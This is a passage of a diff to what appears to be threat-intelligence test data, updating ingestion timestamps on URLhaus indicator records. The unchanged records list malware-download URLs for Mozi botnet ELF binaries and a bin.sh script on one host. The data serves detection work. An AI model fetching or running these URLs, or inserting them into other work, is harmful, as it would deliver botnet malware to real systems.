listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18033,7 +18033,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027189900Z", + "ingested": "2021-12-14T14:56:15.726553737Z", "original": "{\"id\":\"961175\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961175/\",\"url\":\"http://89.160.20.156:54078/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18082,7 +18082,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027196800Z", + "ingested": "2021-12-14T14:56:15.726554192Z", "original": "{\"id\":\"961173\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961173/\",\"url\":\"http://89.160.20.156:34201/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -18131,7 +18131,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027203700Z", + "ingested": "2021-12-14T14:56:15.726554555Z", "original": "{\"id\":\"961174\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961174/\",\"url\":\"http://89.160.20.156:56573/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18181,7 +18181,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027210800Z", + "ingested": "2021-12-14T14:56:15.726554922Z", "original": "{\"id\":\"961172\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961172/\",\"url\":\"http://89.160.20.156:48291/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:08:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -18230,7 +18230,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027217800Z", + "ingested": "2021-12-14T14:56:15.726555288Z", "original": "{\"id\":\"961170\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961170/\",\"url\":\"http://89.160.20.156:60102/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18279,7 +18279,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027224800Z", + "ingested": "2021-12-14T14:56:15.726555755Z", "original": "{\"id\":\"961171\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961171/\",\"url\":\"http://89.160.20.156:52225/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18328,7 +18328,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027231700Z", + "ingested": "2021-12-14T14:56:15.726556192Z", "original": "{\"id\":\"961167\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961167/\",\"url\":\"http://89.160.20.156:56733/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18377,7 +18377,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027238600Z", + "ingested": "2021-12-14T14:56:15.726556648Z", "original": "{\"id\":\"961168\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961168/\",\"url\":\"http://89.160.20.156:57042/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18426,7 +18426,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027245500Z", + "ingested": "2021-12-14T14:56:15.726557015Z", "original": "{\"id\":\"961169\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961169/\",\"url\":\"http://89.160.20.156:38035/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18475,7 +18475,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027252500Z", + "ingested": "2021-12-14T14:56:15.726557381Z", "original": "{\"id\":\"961165\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961165/\",\"url\":\"http://89.160.20.156:33540/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18524,7 +18524,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027259400Z", + "ingested": "2021-12-14T14:56:15.726557814Z", "original": "{\"id\":\"961166\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961166/\",\"url\":\"http://89.160.20.156:51947/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18573,7 +18573,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027266400Z", + "ingested": "2021-12-14T14:56:15.726558185Z", "original": "{\"id\":\"961164\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961164/\",\"url\":\"http://89.160.20.156:36915/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18622,7 +18622,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027273200Z", + "ingested": "2021-12-14T14:56:15.726558578Z", "original": "{\"id\":\"961163\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961163/\",\"url\":\"http://89.160.20.156:38865/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18670,7 +18670,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027280100Z", + "ingested": "2021-12-14T14:56:15.726558941Z", "original": "{\"id\":\"961162\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961162/\",\"url\":\"http://89.160.20.156:55480/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18718,7 +18718,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027287100Z", + "ingested": "2021-12-14T14:56:15.726559393Z", "original": "{\"id\":\"961161\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961161/\",\"url\":\"http://89.160.20.156:51996/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18766,7 +18766,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027294Z", + "ingested": "2021-12-14T14:56:15.726559814Z", "original": "{\"id\":\"961160\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961160/\",\"url\":\"http://89.160.20.156:36042/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18814,7 +18814,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027300900Z", + "ingested": "2021-12-14T14:56:15.726560184Z", "original": "{\"id\":\"961158\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961158/\",\"url\":\"http://89.160.20.156:34350/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18862,7 +18862,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027307900Z", + "ingested": "2021-12-14T14:56:15.726560552Z", "original": "{\"id\":\"961159\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961159/\",\"url\":\"http://89.160.20.156:53587/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18910,7 +18910,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027314900Z", + "ingested": "2021-12-14T14:56:15.726560919Z", "original": "{\"id\":\"961157\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961157/\",\"url\":\"http://89.160.20.156:53444/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18959,7 +18959,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027321800Z", + "ingested": "2021-12-14T14:56:15.726561403Z", "original": "{\"id\":\"961155\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961155/\",\"url\":\"http://89.160.20.156:58653/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19007,7 +19007,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027328700Z", + "ingested": "2021-12-14T14:56:15.726561781Z", "original": "{\"id\":\"961156\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961156/\",\"url\":\"http://89.160.20.156:50579/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19055,7 +19055,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027336Z", + "ingested": "2021-12-14T14:56:15.726562151Z", "original": "{\"id\":\"961152\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961152/\",\"url\":\"http://89.160.20.156:3553/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19104,7 +19104,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027343Z", + "ingested": "2021-12-14T14:56:15.726562518Z", "original": "{\"id\":\"961153\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961153/\",\"url\":\"http://89.160.20.156:35288/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19152,7 +19152,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027349900Z", + "ingested": "2021-12-14T14:56:15.726562892Z", "original": "{\"id\":\"961154\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961154/\",\"url\":\"http://89.160.20.156:46429/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19200,7 +19200,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027356800Z", + "ingested": "2021-12-14T14:56:15.726563316Z", "original": "{\"id\":\"961151\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961151/\",\"url\":\"http://89.160.20.156:44575/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19249,7 +19249,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027364Z", + "ingested": "2021-12-14T14:56:15.726563680Z", "original": "{\"id\":\"961149\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961149/\",\"url\":\"http://89.160.20.156:43245/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19297,7 +19297,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027370900Z", + "ingested": "2021-12-14T14:56:15.726564047Z", "original": "{\"id\":\"961150\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961150/\",\"url\":\"http://89.160.20.156:50444/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19345,7 +19345,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027377800Z", + "ingested": "2021-12-14T14:56:15.726564415Z", "original": "{\"id\":\"961144\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961144/\",\"url\":\"http://89.160.20.156:51318/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19394,7 +19394,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027384700Z", + "ingested": "2021-12-14T14:56:15.726564924Z", "original": "{\"id\":\"961145\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961145/\",\"url\":\"http://89.160.20.156:46221/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19443,7 +19443,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027391600Z", + "ingested": "2021-12-14T14:56:15.726565358Z", "original": "{\"id\":\"961146\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961146/\",\"url\":\"http://89.160.20.156:51430/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19492,7 +19492,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027398500Z", + "ingested": "2021-12-14T14:56:15.726565726Z", "original": "{\"id\":\"961147\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961147/\",\"url\":\"http://89.160.20.156:52028/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19541,7 +19541,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027405500Z", + "ingested": "2021-12-14T14:56:15.726566087Z", "original": "{\"id\":\"961148\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961148/\",\"url\":\"http://89.160.20.156:48291/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19589,7 +19589,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027467600Z", + "ingested": "2021-12-14T14:56:15.726566458Z", "original": "{\"id\":\"961143\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961143/\",\"url\":\"http://89.160.20.156:39613/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19639,7 +19639,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027478700Z", + "ingested": "2021-12-14T14:56:15.726566940Z", "original": "{\"id\":\"961142\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961142/\",\"url\":\"http://89.160.20.156:34201/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:56:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -19688,7 +19688,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027486300Z", + "ingested": "2021-12-14T14:56:15.726567368Z", "original": "{\"id\":\"961141\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961141/\",\"url\":\"http://89.160.20.156:47095/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19737,7 +19737,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027493300Z", + "ingested": "2021-12-14T14:56:15.726567727Z", "original": "{\"id\":\"961136\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961136/\",\"url\":\"http://89.160.20.156:42004/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19786,7 +19786,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027500200Z", + "ingested": "2021-12-14T14:56:15.726568102Z", "original": "{\"id\":\"961137\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961137/\",\"url\":\"http://89.160.20.156:52058/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19835,7 +19835,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027507200Z", + "ingested": "2021-12-14T14:56:15.726568962Z", "original": "{\"id\":\"961138\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961138/\",\"url\":\"http://89.160.20.156:45432/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19884,7 +19884,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027514Z", + "ingested": "2021-12-14T14:56:15.726569444Z", "original": "{\"id\":\"961139\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961139/\",\"url\":\"http://89.160.20.156:49891/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19933,7 +19933,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027521Z", + "ingested": "2021-12-14T14:56:15.726569816Z", "original": "{\"id\":\"961140\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961140/\",\"url\":\"http://89.160.20.156:34334/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19982,7 +19982,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027528Z", + "ingested": "2021-12-14T14:56:15.726570199Z", "original": "{\"id\":\"961135\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961135/\",\"url\":\"http://89.160.20.156:42886/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -20031,7 +20031,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027535Z", + "ingested": "2021-12-14T14:56:15.726570567Z", "original": "{\"id\":\"961134\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961134/\",\"url\":\"http://89.160.20.156:47096/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -20080,7 +20080,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027541800Z", + "ingested": "2021-12-14T14:56:15.726571069Z", "original": "{\"id\":\"961132\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961132/\",\"url\":\"http://89.160.20.156:48214/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -20129,7 +20129,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027548700Z", + "ingested": "2021-12-14T14:56:15.726571436Z", "original": "{\"id\":\"961133\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961133/\",\"url\":\"http://89.160.20.156:40478/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -20178,7 +20178,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027555600Z", + "ingested": 